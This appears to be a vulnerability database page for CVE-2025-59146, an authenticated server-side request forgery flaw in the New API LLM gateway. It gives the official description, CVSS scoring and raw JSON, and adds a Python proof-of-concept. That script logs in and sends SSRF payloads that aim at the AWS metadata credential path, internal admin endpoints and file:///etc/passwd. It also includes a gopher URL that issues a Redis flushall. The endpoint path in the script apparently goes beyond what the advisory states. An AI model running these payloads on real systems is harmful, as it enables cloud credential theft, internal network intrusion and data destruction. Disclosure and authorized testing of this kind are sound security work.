Security Vulnerability Report
中文
CVE-2025-59146 CVSS 8.5 HIGH

CVE-2025-59146

Published: 2025-10-09 19:15:44
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

New API is a large language mode (LLM) gateway and artificial intelligence (AI) asset management system. An authenticated Server-Side Request Forgery (SSRF) vulnerability exists in versions prior to 0.9.0.5. A feature within the application allows authenticated users to submit a URL for the server to process its content. The application fails to properly validate this user-supplied URL before making a server-side request. This vulnerability is not limited to image URLs and can be triggered with any link provided to the vulnerable endpoint. Since user registration is often enabled by default, any registered user can exploit this. By crafting a malicious URL, an attacker can coerce the server to send requests to arbitrary internal or external services. The vulnerability has been patched in version 0.9.0.5. The patch introduces a comprehensive, user-configurable SSRF protection module, which is enabled by default to protect server security. This new feature provides administrators with granular control over outbound requests made by the server. For users who cannot upgrade immediately, some temporary mitigation options are available. Enable new-api image processing worker (new-api-worker) and/or configure egress firewall rules.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

QuantumNous new-api < 0.9.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59146 PoC - New API SSRF Vulnerability # Affected versions: New API < 0.9.0.5 # The vulnerability allows authenticated users to perform SSRF # by submitting malicious URLs to a server-side processing endpoint. import requests # Target configuration TARGET_URL = "https://target-new-api.example.com" USERNAME = "[email protected]" PASSWORD = "password123" # Step 1: Authenticate and obtain session/token session = requests.Session() login_payload = { "username": USERNAME, "password": PASSWORD } login_resp = session.post(f"{TARGET_URL}/api/user/login", json=login_payload) token = login_resp.json().get("data", {}).get("token") session.headers.update({"Authorization": f"Bearer {token}"}) # Step 2: Exploit SSRF via the URL submission endpoint # Various SSRF payloads to demonstrate the vulnerability: # Payload 1: Access AWS metadata service to steal cloud credentials ssrf_payload_aws = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" # Payload 2: Access internal services (e.g., internal admin panel) ssrf_payload_internal = "http://127.0.0.1:8080/admin/internal-api" # Payload 3: Read local files via file:// protocol ssrf_payload_file = "file:///etc/passwd" # Payload 4: Scan internal network ssrf_payload_scan = "http://192.168.1.1:8080/" # Payload 5: Use gopher protocol for advanced exploitation ssrf_payload_gopher = "gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a" # Submit the malicious URL to the vulnerable endpoint def exploit_ssrf(url): payload = { "url": url } resp = session.post(f"{TARGET_URL}/api/proxy/fetch", json=payload) print(f"[*] Target: {url}") print(f"[*] Response: {resp.text}") return resp # Execute the SSRF attack exploit_ssrf(ssrf_payload_aws) exploit_ssrf(ssrf_payload_internal) exploit_ssrf(ssrf_payload_file)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59146", "sourceIdentifier": "[email protected]", "published": "2025-10-09T19:15:43.837", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "New API is a large language mode (LLM) gateway and artificial intelligence (AI) asset management system. An authenticated Server-Side Request Forgery (SSRF) vulnerability exists in versions prior to 0.9.0.5. A feature within the application allows authenticated users to submit a URL for the server to process its content. The application fails to properly validate this user-supplied URL before making a server-side request. This vulnerability is not limited to image URLs and can be triggered with any link provided to the vulnerable endpoint. Since user registration is often enabled by default, any registered user can exploit this. By crafting a malicious URL, an attacker can coerce the server to send requests to arbitrary internal or external services. The vulnerability has been patched in version 0.9.0.5. The patch introduces a comprehensive, user-configurable SSRF protection module, which is enabled by default to protect server security. This new feature provides administrators with granular control over outbound requests made by the server. For users who cannot upgrade immediately, some temporary mitigation options are available. Enable new-api image processing worker (new-api-worker) and/or configure egress firewall rules."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/QuantumNous/new-api/commit/ef634160986c6f6b087cbfe131074fda862928af", "source": "[email protected]"}, {"url": "https://github.com/QuantumNous/new-api/security/advisories/GHSA-xxv6-m6fx-vfhh", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.